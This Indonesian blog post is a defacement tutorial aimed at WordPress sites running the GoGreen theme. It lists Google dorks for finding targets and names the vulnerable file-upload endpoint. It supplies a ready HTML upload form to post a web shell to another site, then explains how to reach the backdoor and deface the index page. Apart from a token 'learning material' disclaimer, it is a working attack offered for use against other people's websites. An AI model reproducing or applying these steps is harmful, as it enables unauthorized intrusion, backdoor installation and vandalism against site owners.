TKJ CYBER ART- Tutorial Deface Website Dengan WordPress GoGreen File Upload Vulnerability, Tutorial Deface kali ini ditekankan kepada website berbasis wordpress dengan tehnik file upoud vulnerability secara umum dan berdasarkan alurnya bisa saya beberkan beberapa penjelasan sedikit mengenai tutorial ini, sembari menambah pengetahuan anda sebelum melakukan tutorial ini, Cross-Site Request Forgery (CSRF) adalah media yang akan kita gunakan untuk melakukan file uploud pada form didalam website yang menggunakan theme GoGreen.
Selanjutnya saya akan sedikit menjelaskan tentang alur deface website kali ini dimana kita akan menggunakan dork google untuk mencari target website dan mengganti bagian belakang url dengan exploit yang telah saya bagikan guna mendapatkan akses uploud form yang nantinya kita gunakan untuk uploud shell selanjutnya kita bisa mengakses website orang lain dengan shell backdoor dan kita bisa melakukan apa saja tapi perlu diingat ini hanya sebagai materi pembelajaran dan biasakan mengembangkan dork untuk mendapat hasil pencarian yang lebih baik lagi. Nah sekarang mari beranjak dan melanjutkan ke tutorial berikut sebelum melakukan tutorial ini silahkan anda cari shell dahulu untuk dapat membuat form uploud :
Bahan Bahan:
1. Dork
inurl:"/wp-content/themes/gogreen/"
inurl:/wp-content/themes/ut-gogreen/ site:com
inurl:/wp-content/themes/gogreen/ site:com
2. Exploit
3. Source Code CSRF (Form upload)
lalu save (all files) dengan nama gogreen.html dan lanjut ke tutorial
/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
3. Source Code CSRF (Form upload)
<h1>
Gantengers GoGreen WordPress Exploit</h1>
<form action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" enctype="multipart/form-data" method="post">
Home Url: <input name="homeurl" type="text" value="http://" />
Template: <input name="template" type="text" value="gogreen" />
Dir1: <input name="themeroot" type="text" />
Dir2: <input name="dir" type="text" />
File: <input name="file_upload" type="file" />
<input type="submit" value="upload" />
</form>
lalu save (all files) dengan nama gogreen.html dan lanjut ke tutorial
Step By Step:
- pastekan Dork di kotak pencarian google
- pilih web target
- masukan exploit setelah url target: contoh:
www.target.co.li/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
jika gambar seperti diatas, kemungkinan web target anda vuln.
langsung edit CSRF gogreen.html nya , ganti/edit url target yang ada di CSRF gogreen tadi, ganti dengan url web keluarga lo kaleee :p
lalu save dan bukak kembali file gogreen.htmlnya.
isi kan data seperti digambar :D
jika shell sukses tertanam maka akan langsung menuju ke akses shell anda atau kalo muncul bacaan / notice DONE=> namashellanda.php
itu letak shellnya disini: www.target.co.li/namashellanda.php
atau bisa akses shell nya dimari:
http://www.target.com/wp-content/themes/ut-gogreen/addpress/includes/gantengers/shell.php
itu letak shellnya disini: www.target.co.li/namashellanda.php
atau bisa akses shell nya dimari:
http://www.target.com/wp-content/themes/ut-gogreen/addpress/includes/gantengers/shell.php
noh kalo dah kaya diatas :v shell dah ketanem layaknya pintu masuk dan boom :v wkwkw
bebas deh sobat apain, mo di upload file , tebas index , iris tipis , potong manis .
btw hargain karya dan kerja keras webmasternya >.< ,, ya di titip file aja ya kak >.<
Sekian tutorial kali ini.
Semoga bermanfaat. maaf bila ada kekurangan.
Source and thanks to: Gantengers
./Nuenomaru
Nuenomaru just an illusion in Cyber World
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
EmoticonEmoticon